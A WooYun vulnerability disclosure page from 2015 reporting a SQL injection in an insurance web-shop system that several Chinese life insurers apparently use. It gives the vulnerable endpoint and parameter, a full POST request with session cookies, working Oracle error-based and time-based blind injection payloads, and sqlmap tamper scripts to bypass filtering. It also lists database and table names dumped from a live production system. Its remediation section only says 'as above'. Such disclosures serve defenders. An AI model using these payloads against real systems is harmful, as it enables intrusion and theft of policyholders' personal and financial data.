当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155114

漏洞标题:某人寿保险商城系统通用SQL注入漏洞之二

相关厂商:国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-11-23 14:44

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2016-01-21: 细节向核心白帽子及相关领域专家公开
2016-01-31: 细节向普通白帽子公开
2016-02-10: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

某人寿保险商城系统通用SQL注入漏洞#2

详细说明:

接http://**.**.**.**/bugs/wooyun-2015-0151719 发现还有一个
涉及国华人寿、珠江人寿、君康人寿、国联人寿、中韩人寿等 其中不乏已经入驻的厂商。
漏洞位置:/eservice/asset/asset.do
注入参数:contNo
注:漏洞利用之前,需注册个普通会员账号,这个比较简单,就不多赘述。
部分案例如下:

国华人寿
**.**.**.**/eservice/account/register.action?action=initSingle
珠江人寿
**.**.**.**/eservice/account/register.action?action=initSingle
君康人寿
**.**.**.**/eservice/account/register.action?action=initSingle
国联人寿
**.**.**.**/eservice/eservice/account/register.action ?action=initSingle
中韩人寿
**.**.**.**/eservice/account/login.action ?action=initSingle


漏洞验证:
珠江人寿:
**.**.**.**/eservice/account/register.action?action=initSingle
注册个人普通用户登陆:
个人中心——我的收益——-保单号查询

11.png


POST /eservice/asset/asset.do?action=getLinkedConts&ajax=true HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://**.**.**.**/eservice/user/customer.do?action=home&username=weaver
Accept: application/xml, text/xml, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: **.**.**.**
Content-Length: 108
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: __ghuid=51889761446607646641; JSESSIONID=HL23WRdbzgBypYNQbVSqpJbC0Nyh2FQrdGQ4BmP2txXVtgnFt55R!466292693; prlife_point=A001e5fe40f2c1ab5b2b930f8e512761425eHL23WRdbzgBypYNQbVSqpJbC0Nyh2FQrdGQ4BmP2txXVtgnFt55R!466292693!1448205755481; SERVERID=35e68b17710f16ae0d3436af3358bffd|1448206706|1448205755
contNo=1111&endValidateDate=&startValidateDate=&_search=false&nd=1448206710146&rows=10&page=1&sidx=&sord=asc


可使用脚本between.py

---
Parameter: contNo (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: contNo=1111' AND 4737=CTXSYS.DRITHSX.SN(4737,(CHR(113)||CHR(122)||C
HR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4737=4737) THEN 1 ELSE 0 END) FRO
M DUAL)||CHR(113)||CHR(118)||CHR(118)||CHR(122)||CHR(113))) AND 'GYIJ' LIKE 'GYI
J&endValidateDate=&startValidateDate=&_search=false&nd=1448206710146&rows=10&pag
e=1&sidx=&sord=asc
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: contNo=1111' AND 6818=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS
T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'zTOy' LIKE 'zTOy&endValidateDate
=&startValidateDate=&_search=false&nd=1448206710146&rows=10&page=1&sidx=&sord=as
c
---


11.png


available databases [10]:
[*] APEX_030200
[*] CTXSYS
[*] ESERVICE
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] POINT
[*] SYS
[*] SYSTEM
[*] XDB


Database: ESERVICE
[171 tables]
+--------------------------------+
| BAK_T_ACCOUNT_VALUE_D_0819     |
| BAK_T_ACCOUNT_VALUE_D_SNP_0819 |
| EBIZ_ACCOUNT_AUTH              |
| EBIZ_APPLY_SURRENDER           |
| EBIZ_APPNT                     |
| EBIZ_APPOINTMENT_DETAIL        |
| EBIZ_APPOINTMENT_INFO          |
| EBIZ_BATCH_INFO                |
| EBIZ_BNF                       |
| EBIZ_BUSINESS_TRADE            |
| EBIZ_CHECK_BATCH               |
| EBIZ_CHECK_DETAIL              |
| EBIZ_CLAIM_REPORT              |
| EBIZ_CODE                      |
| EBIZ_COMPLAIN_SUGGEST          |
| EBIZ_CONT_RENEWAL              |
| EBIZ_CONT_RENEWAL_DETAIL       |
| EBIZ_CONT_TOPUP                |
| EBIZ_CORE_ESERVICE_IMPORT      |
| EBIZ_CORE_INSURANCE_IMPORT     |
| EBIZ_CORE_SURRENDER            |
| EBIZ_ELEC_CONT                 |
| EBIZ_ELEC_NOTICE               |
| EBIZ_ENSURE_LIABILITY          |
| EBIZ_GROUP_BILLNO              |
| EBIZ_HOLIDAY_MONTH_COUNT       |
| EBIZ_ID_VERIFY                 |
| EBIZ_IMPART                    |
| EBIZ_IMPART_ITEM               |
| EBIZ_INSURED                   |
| EBIZ_IP_RECORD                 |
| EBIZ_JD_REFUND                 |
| EBIZ_JKB_ACCOUNT               |
| EBIZ_JKB_ORDER_CLAIM           |
| EBIZ_JKB_PAY_ORDER             |
| EBIZ_JKB_PLATFORM              |
| EBIZ_JKB_REFUND                |
| EBIZ_LOGIN_CHECK               |
| EBIZ_MAIL_SEND                 |
| EBIZ_MESSAGE_EXCHANGE          |
| EBIZ_MESSAGE_TEMPLATE          |
| EBIZ_MOBILE_RECHARGE           |
| EBIZ_OCCUPATION                |
| EBIZ_OPER_HIS                  |
| EBIZ_ORDER                     |
| EBIZ_ORDER_ACCOUNT             |
| EBIZ_ORDER_AUTH                |
| EBIZ_ORDER_INSURANCE           |
| EBIZ_ORDER_REVISIT             |
| EBIZ_ORDER_REVISIT_DETAIL      |
| EBIZ_ORDER_RISK_AMNT           |
| EBIZ_ORDER_SURRENDER           |
| EBIZ_ORDER_TYPE_PROPERTY       |
| EBIZ_PAYMENT                   |
| EBIZ_POINT_ACCOUNT             |
| EBIZ_POINT_ACTION              |
| EBIZ_POINT_AUDIT               |
| EBIZ_POINT_EVENT               |
| EBIZ_POINT_EXCHANGE            |
| EBIZ_POINT_EXCHANGE_DETAIL     |
| EBIZ_POINT_GIFT                |
| EBIZ_POINT_HISTORY             |
| EBIZ_POINT_ORDER               |
| EBIZ_POINT_RULE                |
| EBIZ_POINT_TASK                |
| EBIZ_PORTRAY_ATTACH            |
| EBIZ_PRODUCT                   |
| EBIZ_PRODUCT_CHECKRULE         |
| EBIZ_PRODUCT_ENSURE            |
| EBIZ_PRODUCT_OCCUPATION        |
| EBIZ_PRODUCT_PROPERTY          |
| EBIZ_PRODUCT_RECOMMEND         |
| EBIZ_PUBLIC_ALARM              |
| EBIZ_PUBLIC_FEEBACK            |
| EBIZ_PUBLIC_MENU               |
| EBIZ_PUBLIC_MESSAGE            |
| EBIZ_PUBLIC_MSG_EXCHANGE       |
| EBIZ_PUBLIC_PLATFORM           |
| EBIZ_PUBLIC_RECEIVE_CONFIG     |
| EBIZ_PUBLIC_SEND               |
| EBIZ_PUBLIC_USER               |
| EBIZ_RECIPIENT_INFO            |
| EBIZ_RECOMMENDED               |
| EBIZ_RECOMMEND_CHANNEL         |
| EBIZ_RECOMMEND_PROMOTER        |
| EBIZ_RECOMMEND_REWARD          |
| EBIZ_RECOMMEND_REWARD_RULE     |
| EBIZ_SMS_TIME                  |
| EBIZ_SMS_WAITQUEUE             |
| EBIZ_STATISTICS_HIS            |
| EBIZ_STATISTICS_VISITOR        |
| EBIZ_SY_BANKLOCATIONS          |
| EBIZ_SY_BANKS                  |
| EBIZ_SY_STANDARDAREAS          |
| EBIZ_TEL_ACTIVITY              |
| EBIZ_TEL_ACT_PRO               |
| EBIZ_TEL_DEPT                  |
| EBIZ_TEL_ORDER                 |
| EBIZ_TEL_RESERVE               |
| EBIZ_TEL_ROLE                  |
| EBIZ_TEL_SETTLE                |
| EBIZ_TEL_USER                  |
| EBIZ_TEL_USER_DEPT             |
| EBIZ_TEL_USER_ROLE             |
| EBIZ_THIRD_FILE                |
| EBIZ_THIRD_NOTIFY              |
| EBIZ_THIRD_ORDER               |
| EBIZ_THIRD_REFUND_PAYMENT      |
| EBIZ_THIRD_SURRENDER           |
| EBIZ_THIRD_TOPUP               |
| EBIZ_THIRD_TRADE               |
| EBIZ_THIRD_TRADE_2015012901    |
| EBIZ_THIRD_TRADE_20150501      |
| EBIZ_THIRD_TRADE_20150813      |
| EBIZ_THIRD_TRADE_BAK           |
| EBIZ_THIRD_TRADE_HIS           |
| EBIZ_USER_HIS                  |
| EBIZ_USER_MERGE                |
| EBIZ_USER_MERGE_DETAIL         |
| EBIZ_USER_SUBSCRIBE            |
| EBIZ_USER_THIRD_INFO           |
| EBIZ_USER_WEIXIN_INFO          |
| EBIZ_VALIDATE_CODE             |
| EBIZ_WEBSITE_LOAN_RATE         |
| EBIZ_WEBSITE_RATE              |
| EBIZ_WEBSITE_RATE_DATE         |
| EBIZ_WEBSITE_RATE_PRODUCT      |
| EBIZ_WEIXIN_MESSAGE            |
| EBIZ_ZCB_OPERATE               |
| EBIZ_ZCB_ORDER                 |
| EBIZ_ZCB_PRODUCT               |
| ES_CUSTOMERCONT                |
| ETL_LOAD_PARA_BATCH            |
| ETL_LOAD_RESET                 |
| MAIL_MAIN_ATTACHMENT_TAB       |
| MAIL_MAIN_ATTACHMENT_TAB_BAK   |
| MAIL_MAIN_TAB                  |
| MAIL_MAIN_TAB_BAK              |
| ORDER_RECOMMEND                |
| PAY_TRADE_MISSION              |
| PAY_TRADE_REQUEST              |
| PF_CODE                        |
| PF_CPERMISSION                 |
| PF_CROLE                       |
| PF_CROLECPERMISSION            |
| PF_CROLECUSTOMER               |
| PF_CUSTOMER                    |
| RECIPIENT_INFO                 |
| TEMP_TAOBAO1212                |
| TEMP_TAOBAO1212_YYKH           |
| TEMP_TAOBAO1212_ZM             |
| TOPIC_ACTIVITY                 |
| TOPIC_ACTIVITY_RECOMMEND       |
| TOPIC_CUSTOMER                 |
| TOPIC_GIFT                     |
| TOPIC_GIFT_LIST                |
| TOPIC_GIFT_POOL                |
| TOPIC_SNOWY_CHILDREN           |
| T_ACCOUNT_VALUE_D              |
| T_ACCOUNT_VALUE_D_SNP          |
| T_ACCOUNT_VALUE_D_SNP_TMP0912  |
| T_ACCOUNT_VALUE_D_TMP0912      |
| T_ALL_PERMIUM_EBIZ             |
| T_AML_MONITOR_LIST             |
| T_OUTSRV_TRANS_PRE             |
| T_PAY                          |
| T_PAY_20151015                 |
| T_PAY_CORE                     |
| T_TMP_BANK                     |
| T_WY_PAY                       |
| WEIXIN_MAIN_TAB                |
+--------------------------------+


11.png


君康人寿: 可使用between.py,space2comment.py,randomcase.py
**.**.**.**/eservice/account/register.action?action=initSingle

11.png


11.png


当前数据库:

11.png

漏洞证明:

如上!

修复方案:

如上!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-11-27 10:44

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向证券业信息化主管部门通报,由其后续协调网站管理单位处置。

最新状态:

暂无